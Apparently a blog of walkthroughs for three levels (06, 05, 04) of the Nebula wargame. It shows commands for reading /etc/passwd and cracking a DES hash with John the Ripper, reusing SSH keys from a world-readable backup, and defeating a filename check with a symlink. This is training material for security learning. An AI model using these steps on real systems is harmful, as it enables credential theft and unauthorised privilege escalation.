Exploit Exercises Nebula — level06

“(…) account credentials came from a legacy unix system” mhm:

$ cat /etc/passwd
(...)
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
(...)

Ah, good old DES:

$ echo ueqwOCnSGdsuM > flag06.des
$ ./john flag06.des --show
?:hello

thus:

$ su flag06
sh-4.2$ getflag
You have successfully executed getflag on a target account

Nice one.

Exploit Exercises Nebula — level05

From the description we get one hint: weak permissions. And this is sufficient to easily solve this challenge.

First things first navigate to /home/flag05 and try to list its contents:

$ cd /home/flag05
$ ls
$

That’s odd. It looks like it’s empty. Let’s try to list *all*:

$ ls -al /home/flag05
total 36
drwxr-x--- 5 flag05 level05 4096 2013-02-26 15:45 .
drwxr-xr-x 43 root root 4096 2011-11-20 20:21 ..
drwxr-xr-x 2 flag05 flag05 4096 2011-11-20 20:13 .backup
-rw------- 1 flag05 flag05 36 2013-02-26 15:46 .bash_history
-rw-r--r-- 1 flag05 flag05 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05 3353 2011-05-18 02:54 .bashrc
drwx------ 2 flag05 flag05 4096 2013-02-26 15:45 .cache
-rw-r--r-- 1 flag05 flag05 675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05 4096 2011-11-20 20:13 .ssh

Now, that’s better! Also it’s easy to make connection between initial hint and permissions for .ssh and .backup. Let’s see what’s in the .backup:

$ ls /home/flag05/.backup
total 12
drwxr-xr-x 2 flag05 flag05 4096 2011-11-20 20:13 .
drwxr-x--- 5 flag05 level05 4096 2013-02-26 15:45 ..
-rw-rw-r-- 1 flag05 flag05 1826 2011-11-20 20:13 backup-19072011.tgz

So we have a backup archive which everyone can read. Copy that to home directory and see what’s there:

$ cp /home/flag05/.backup/backup-19072011.tgz ~/
$ tar -zxvf ~/backup-19072011.tgz
$ ls -al ~/
total 36
drwxr-x--- 4 level05 level05 4096 2013-02-26 15:46 .
drwxr-xr-x 43 root root 4096 2011-11-20 20:21 ..
-rw-rw-r-- 1 level05 level05 1826 2013-02-26 14:08 backup-19072011.tgz
-rw------- 1 level05 level05 705 2013-02-26 15:42 .bash_history
-rw-r--r-- 1 level05 level05 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 level05 level05 3353 2011-05-18 02:54 .bashrc
drwx------ 2 level05 level05 4096 2013-02-26 13:48 .cache
-rw-r--r-- 1 level05 level05 675 2011-05-18 02:54 .profile
drwxr-xr-x 2 level05 level05 4096 2013-02-26 15:46 .ssh

We can see that we have obtained .ssh directory which contains keys for ssh; connecting this information with previous challenge we can try connecting to localhost as flag05 account:

$ ssh -l flag05 localhost
flag05@localhost$ getflag
You have successfully executed getflag on a target account

Easy-peasy.

Exploit Exercises Nebula — level04

Mirroring exploit-exercises with each entry is pointless so from now on I’ll just focus on writing solutions.

Our task in this level is to read /home/flag04/token with /home/flag04/flag04 however following lines try to prevent it:

if(strstr(argv[1], "token") != NULL) {
printf("You may not access '%s'\n", argv[1]);
exit(EXIT_FAILURE);
}

It is plain to see that they only check for string “token” in provided argument hence making a symlink will suffice.

$ ln -s /home/flag04/token /home/level04/fake
$ /home/flag04/flag04 /home/level04/fake
06508b5e-8909-4f38-b630-fdb148a848a2

Now after receiving contents of the token file I was confused. The question was “What I should do with it?” but IRC came with help; apparently switching users to flag04 with 06508b5e-8909-4f38-b630-fdb148a848a2 as password works and is a valid solution thus one can run /bin/getflag with flag04 privileges.